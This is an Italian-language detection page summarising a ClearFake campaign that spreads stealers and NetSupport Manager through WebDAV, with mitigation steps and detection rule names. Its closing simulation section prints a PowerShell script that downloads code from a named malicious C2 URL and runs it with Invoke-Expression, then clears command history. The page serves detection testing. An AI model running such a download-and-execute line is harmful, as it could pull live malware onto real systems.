La catena di infezione ClearFake WebDAV consegna Amatera stealer, ZigCryptoStealer e NetSupport Manager
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
Una campagna guidata da ClearFake sta abusando di WebDAV e Cloudflare Workers per distribuire vari payload di malware. Il payload principale, Amatera stealer, è progettato per esfiltrare credenziali e dati relativi alle criptovalute. I payload aggiuntivi includono ZigCryptoStealer distribuito tramite un loader NativeAOT e istanze non autorizzate di NetSupport Manager utilizzate per stabilire l’accesso remoto.
Indagine
Cisco Talos ha investigato su un sospetto esecuzione di DLL basato su WebDAV presso un’organizzazione governativa ucraina. L’analisi ha scoperto due catene di infezione separate: una sfrutta un pf.ch loader per distribuire ZigCryptoStealer e un proxy inverso basato su Go, e un’altra utilizza un verification.google loader per installare NetSupport Manager.
Mitigazione
Le organizzazioni dovrebbero limitare l’esecuzione da percorsi WebDAV e UNC e monitorare comportamenti anomali di rundll32.exe . Dovrebbero essere utilizzati controlli EDR robusti per rilevare tecniche come DLL hollowing e module stomping. I team di sicurezza dovrebbero anche monitorare l’uso non autorizzato di NetSupport Manager e attività di rete sospette relative alla blockchain.
Risposta
Se viene rilevata un’attività dannosa, gli endpoint interessati dovrebbero essere isolati immediatamente per prevenire ulteriori esfiltrazioni di dati. Gli operatori della sicurezza dovrebbero eseguire analisi della memoria per identificare malware residente, come Amatera. I team di sicurezza dovrebbero anche cercare esecuzioni di DLL basate su WebDAV e attività insolite di PowerShell in tutto l’ambiente.
Flusso di Attacco
Stiamo ancora aggiornando questa parte.
Rilevamenti
Stringhe PowerShell sospette (tramite powershell)
LOLBAS Conhost (tramite cmdline)
Possibili Indicatori di Offuscazione PowerShell (tramite powershell)
Possibile Abuso di Telegram come Canale di Comando e Controllo (via dns_query)
Comando e Controllo sospetto tramite Richiesta DNS di Dominio di Livello Superiore (TLD) insolito (via dns)
IOC (IP Sorgente) da rilevare: catena di infezione ClearFake WebDAV che distribuisce Amatera stealer, ZigCryptoStealer e NetSupport Manager
IOC (IP Destinazione) da rilevare: catena di infezione ClearFake WebDAV che distribuisce Amatera stealer, ZigCryptoStealer e NetSupport Manager
Comunicazione C2 tramite WebSocket Secure con Dubbedmuch per l’esfiltrazione dei dati [Proxy]
Rileva download di script PowerShell ed esecuzione di NetSupport Manager [Windows Powershell]
Esecuzione DLL WebDAV tramite rundll32.exe [Creazione Processo di Windows]
Esecuzione della Simulazione
Prerequisito: Il controllo pre-volo di Telemetria & Baseline deve essere superato.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirano a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a errori di diagnosi.
-
Narrazione dell’Attacco & Comandi: L’avversario sta simulando una catena di infezione “ClearFake”. L’obiettivo è distribuire lo strumento di accesso remoto NetSupport Manager per stabilire la persistenza e il controllo remoto. Per evitare il rilevamento basato su firme dei download di file, l’attaccante utilizza una “one-liner” PowerShell che recupera un payload JavaScript/PowerShell da un server di C2 remoto (
https://kr.cedar2glanz.ru/jewel.js) e lo esegue direttamente nel buffer di memoria usandoInvoke-Expression. Questa tecnica lascia una minima impronta su disco. -
Script di Test di Regressione:
# Script di Simulazione: Imita l'esecuzione del payload della catena di infezione ClearFake # AVVERTIMENTO: Questo script utilizza l'URL dannoso specifico definito nella regola di rilevamento per attivare un avviso. $maliciousUrl = "https://kr.cedar2glanz.ru/jewel.js" Write-Host "[+] Simulazione di download ed esecuzione PowerShell dannoso..." -ForegroundColor Yellow # Questo comando imita il pattern esatto: URL + IEX/Invoke-Expression # Usiamo un blocco try/catch perché l'URL è in realtà irraggiungibile/morto, # ma la LINEA DI COMANDO DEL PROCESSO sarà comunque registrata. try { Invoke-Expression (New-Object Net.WebClient).DownloadString($maliciousUrl) } catch { Write-Host "[!] Comando eseguito (Errore di rete previsto, ma la telemetria dovrebbe essere generata)." -ForegroundColor Cyan } -
Comandi di Pulizia:
# Non vengono creati file da questa simulazione specifica poiché è un test di esecuzione in memoria. # Tuttavia, cancelliamo la cronologia dei comandi per rimuovere tracce dalla sessione utente locale. Clear-History Write-Host "[+] Pulizia completata. Nessun artefatto lasciato su disco." -ForegroundColor Green